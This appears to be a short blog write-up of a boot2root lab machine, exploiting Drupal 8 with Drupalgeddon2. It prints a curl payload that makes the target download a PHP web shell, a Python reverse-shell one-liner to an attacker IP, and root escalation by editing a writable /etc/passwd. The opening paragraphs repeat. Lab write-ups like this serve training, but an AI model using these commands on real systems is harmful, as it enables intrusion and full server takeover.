Hello Friends,
This is my first boot2root writeup on a vuln machine made by my brother Manish Kishan Tanwar .
This machine is based on latest vulnerability of Drupal CMS.
Let's get started ...
Since port 80 was open , therefore I tried testing the webapp. After looking at the source code , it was clear that the website was running on a cms called drupal.I verified the version of drupal from changelog.txt.
The cms version of drupal used was 8.x. Suddenly something clicked my mind and I thought of giving a try for the famous drupalgeddon2 exploit.I tried exploiting through curl.
I used following command to download a php web shell -
curl -s -X 'POST' --data 'mail[%23post_render][]=exec&mail[%23children]='"wget http://192.168.1.78/ninja.php"'&form_id=user_register_form' 'http://192.168.1.108/user/register?element_parents=account/mail/%23value&ajax_form=1' | cut -d ":" -f5
Thanks for reading .Happy Hacking ;)
This is my first boot2root writeup on a vuln machine made by my brother Manish Kishan Tanwar .
This machine is based on latest vulnerability of Drupal CMS.
Let's get started ...
Since port 80 was open , therefore I tried testing the webapp. After looking at the source code , it was clear that the website was running on a cms called drupal.I verified the version of drupal from changelog.txt.
The cms version of drupal used was 8.x. Suddenly something clicked my mind and I thought of giving a try for the famous drupalgeddon2 exploit.I tried exploiting through curl.
I used following command to download a php web shell -
curl -s -X 'POST' --data 'mail[%23post_render][]=exec&mail[%23children]='"wget http://192.168.1.78/ninja.php"'&form_id=user_register_form' 'http://192.168.1.108/user/register?element_parents=account/mail/%23value&ajax_form=1' | cut -d ":" -f5
Through php shell , I got reverse shell on netcat by using python reverse shell command.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.78",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
The reverse shell which I got was not interactive and therefore I needed to spawn tty using- python -c 'import pty;pty.spawn("bin/sh")' command
I tried multiple things including running some kernel exploits etc. I found that /etc/passwd was having all the permissions and I was able to edit this file.I saw that there was a account present in /etc/passwd file with some encrypted hashes.I saw similar thing during my oscp lab and therefore tried adding my root password hash into passwd root user entry.
If a password hash is present in the second column in /etc/passwd, it takes precedence over the one in /etc/shadow and thus I was able to login as root .
Thanks for reading .Happy Hacking ;)
Comments
Post a Comment